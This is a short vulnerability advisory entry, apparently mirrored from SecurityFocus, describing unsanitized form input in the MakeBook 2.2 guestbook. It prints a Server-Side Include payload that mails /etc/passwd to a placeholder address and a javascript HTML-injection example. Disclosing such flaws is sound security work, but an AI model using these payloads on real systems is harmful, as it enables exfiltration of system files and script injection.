Lucene search

K
seebugRootSSV:75360
HistoryJul 01, 2014 - 12:00 a.m.

MakeBook 2.2 Form Field Input Validation Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
9

No description provided by source.


                                                source: http://www.securityfocus.com/bid/4996/info

The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment. 

Server-Side Include example:

Name: <!--#exec cmd="/bin/mail address@host < /etc/passwd"-->

HTML Injection example:

Name: <img src="javascript:alert('test');">